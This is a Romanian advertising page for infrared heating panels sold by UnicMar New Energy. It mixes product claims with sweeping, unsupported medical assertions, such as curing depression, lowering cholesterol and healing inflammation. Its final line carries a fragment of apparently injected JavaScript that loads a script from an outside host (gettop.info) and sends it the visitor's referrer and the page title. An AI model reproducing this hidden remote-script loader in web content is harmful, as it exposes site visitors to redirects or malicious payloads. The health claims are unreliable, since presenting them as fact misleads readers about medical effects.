sisteme incalzire cu panouri infrarosu

sisteme incalzire cu panouri infrarosuCauti cea mai eficienta metoda de incalzire? Vrei sa ai accesul la confort prin intermediul unui sistem de incalzire inovator si, totusi, nu foarte scump? Orienteaza-ti atentia asupra unor sisteme incalzire cu panouri infrarosu . Comparativ cu restul sistemelor de incalzire, cele cu panouri in infrarosu ofera beneficii si in materie de sanatate. Da, este adevarat! Sistemele de incalzire cu panouri in infrarosu actioneaza pozitiv asupra psihicului si fizicului uman. Deci, cu sisteme incalzire cu panouri infrarosu ai confort, caldura, facturi injumatatite la plata intretinerii, plus, o sanatate de invidiat.

UnicMar New Energy, companie ce are ca principal domeniu de activitate productia si furnizarea  unei game vaste de echipamente din domeniul energiei regenerabile , iti pune la dispozitie o gama completa de sisteme incalzire cu panouri infrarosu, la preturi competitive.

Sistemele de incalzire cu panouri infrarosu conving, in primul rand, gratie caldurii placute pe care o furnizeaza. Mai exact, un astfel de sistem nu doar ca incalzeste aerul ci toate obiectele care se afla in incapare, adica corpul omenesc, mobilierul si peretii.

Avand o experienta vasta in domeniul energiei regenerabile, UnicMar New Energy iti propune cele mai eficiente sisteme incalzire cu panouri infrarosu.

Sisteme incalzire cu panouri infrarosu-Solutia nr.1 in materie de confort si incalzire

Ai incercat toate metodele de incalzire traditionala? Niciun beneficiu? Inseamna ca nu ai incercat, inca, sisteme incalzire cu panouri infrarosu. Vorbim nu despre un echipament comun, banal si cu avantaje limitate, ci despre o solutie foarte inteligenta pentru obtinerea nivelului maxim de confort.

Ce este un sistem incalzire cu panouri infrarosu?

Panourile infrarosu sunt panouri de incalzire a locuintei ce functioneaza pe baza de radiatii infrarosu (radiatii-benefice pentru organism). Acestea au in componenta lor fibra de carbon cu capacitate mare de emisivitate si durabilitate crescuta (functioneaza fara probleme cel putin 20 de ani!).

Cum functioneaza un sistem incalzire cu panouri infrarosu?

Soarele incalzeste pamantul prin intermediul radiatiilor infrarosii. La fel si sistemul de incalzire cu panouri infrarosu. Avand la baza acest sistem de functionare, nu este de mirare de ce panourile cu infrarosu ofera o stare de bine oamenilor…asemeni unei zile petrecute, afara, in bataia soarelui. Undele infrarosii eficientizeaza procesele fiziologice la nivel celular si ajuta la reglarea echilibrului termic a organismelor vii.

Avantaje sistem incalzire cu panouri infrarosu

1. Costurile cu achizitia si montarea panourilor infrarosii sunt mult mai mici in comparatie cu instalarea unui sistem clasic

2. Incalzeste perfect orice cladire, in special pe cele cu inaltime mare

3. Are o durabilitate de peste 20 de ani

4.  Regleaza umiditatea

5.  Elimina igrasia

6. Nu necesita intretinere speciala

7. Este foarte benefic pentru sanatate (dilata vasele de sange periferice, imbunatateste aspectul pielii, elimina starile depresive si anxietatea, are efect analgezic/antiseptic/antiinflamator, ajuta la ameliorarea spasmelor musculare, imbunatateste mobilitatea articulatiilor, ajuta la reducerea colesterolului din sange, etc.)

8. Functionare complet silentioasa

9. Randament aproape de 100%

10. Caldura sanatoasa

Sisteme incalzire cu panouri infrarosu, doar prin UnicMar New Energy!

Daca vrei sa ai garantia unui sistem perfect necesitatilor tale, apeleaza la UnicMar New Energy si bucura-te de un sistem ecologic de ultima generatie, la un pret accesibil. In oferta UnicMar New Energy gasesti sisteme incalzire cu panouri infrarosu, in gama completa, usor de adaptat oricaror cladiri (rezidentiale, comerciale, administrative, etc.). Echipa noastra iti sta la dispozitie si cu servicii de consiliere in alegerea corecta a sistemelor.

Pentru sisteme incalzire cu panouri infrarosu, acceseaza www.unicmar.ro si comanda.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;